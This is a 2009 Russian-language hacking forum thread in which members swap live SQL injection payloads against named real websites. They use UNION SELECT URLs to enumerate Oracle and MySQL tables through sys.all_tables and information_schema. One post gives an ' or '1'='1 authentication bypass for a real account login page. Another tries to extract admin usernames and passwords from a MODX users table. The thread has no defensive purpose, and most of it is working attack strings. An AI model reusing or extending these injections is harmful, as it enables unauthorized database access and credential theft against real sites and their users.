HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.08.2009, 19:45
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию

2 z00MAN

Блин я не могу запустить, нету прав админа на компе (((. попробовал : madnet.name/tools/madss/ ..... ничего не показал. Есть что нибудь еще ?
 
Ответить с цитированием

  #2  
Старый 19.08.2009, 19:57
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


По умолчанию

Цитата:
Сообщение от Saiga  
2 z00MAN

Блин я не могу запустить, нету прав админа на компе (((. попробовал : madnet.name/tools/madss/ ..... ничего не показал. Есть что нибудь еще ?
заюзай дедик стоит 1-3 бакса
 
Ответить с цитированием

  #3  
Старый 20.08.2009, 16:30
edge911
Участник форума
Регистрация: 21.02.2009
Сообщений: 228
Провел на форуме:
2175726

Репутация: 368
По умолчанию

помогите плиз , с inj в oracle , а то че то не версию не чо вывести немогу)
Цитата:
http://www.kstu.ru/1leveltest.jsp?idparent=189+select+union+null+from +SYS.DUAL
 
Ответить с цитированием

  #4  
Старый 20.08.2009, 17:23
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Цитата:
Сообщение от edge911  
помогите плиз , с inj в oracle , а то че то не версию не чо вывести немогу)
Гнусный оракл

http://www.kstu.ru/al_spis_sotr.jsp?first=9'+union+select+null,table_ name,null,null,null,null,null+from+sys.all_tables--+
 
Ответить с цитированием

  #5  
Старый 20.08.2009, 18:33
fraIzer
Новичок
Регистрация: 27.07.2009
Сообщений: 13
Провел на форуме:
63551

Репутация: 13
По умолчанию

del

Последний раз редактировалось fraIzer; 20.08.2009 в 21:18..
 
Ответить с цитированием

  #6  
Старый 20.08.2009, 18:35
edge911
Участник форума
Регистрация: 21.02.2009
Сообщений: 228
Провел на форуме:
2175726

Репутация: 368
По умолчанию

Microsoft JET Database
Цитата:
http://www.bestperiodica.com/Category.asp?cid=1+union+select+1+from+golovoi_op_ stenu
не как не могу подобрать таблицу =(

Последний раз редактировалось edge911; 20.08.2009 в 18:37..
 
Ответить с цитированием

  #7  
Старый 20.08.2009, 18:47
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


По умолчанию

http://www.bestperiodica.com/Category.asp?cid=1+union+select+1+from+user
 
Ответить с цитированием

  #8  
Старый 20.08.2009, 18:53
edge911
Участник форума
Регистрация: 21.02.2009
Сообщений: 228
Провел на форуме:
2175726

Репутация: 368
По умолчанию

Цитата:
http://www.bestperiodica.com/Category.asp?cid=1+union+select+1+from+user
уверен ?
Цитата:
"select ... from user" использоваться нельзя, так как user это внутреннее имя и таблицой оно быть не может.
_http://forum.antichat.ru/threadnav50550-3-10.html

Последний раз редактировалось edge911; 20.08.2009 в 18:58..
 
Ответить с цитированием

  #9  
Старый 20.08.2009, 18:58
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

К MSysObjects доступа нет, так что только перебором

Кста там обход авторизации возможен http://www.bestperiodica.com/MyAccount.asp
В E-mail ' or '1'='1#
в пароль что угодно
 
Ответить с цитированием

sql inj
  #10  
Старый 20.08.2009, 19:10
lucky_guy
Новичок
Регистрация: 17.08.2009
Сообщений: 11
Провел на форуме:
25459

Репутация: 3
По умолчанию sql inj

короче, есть бажный сайт:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+1,2/*
в нем столько табличек:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+all+select+1,table_name+from+informati on_schema.tables+limit+86,1/*
самые интересные это:
modx_active_users -тридцатая
modx_manager_users -37
modx_web_users -66
из них получаем столбцы:
username
password
но когда я хочу просмотреть эти столбцы вводя например вот это:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+username,password+from+modx_man ager_users+limit+1,1/*
то никакого имени и пароля не получается!
может я не так что-то делаю, помогите кто может.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.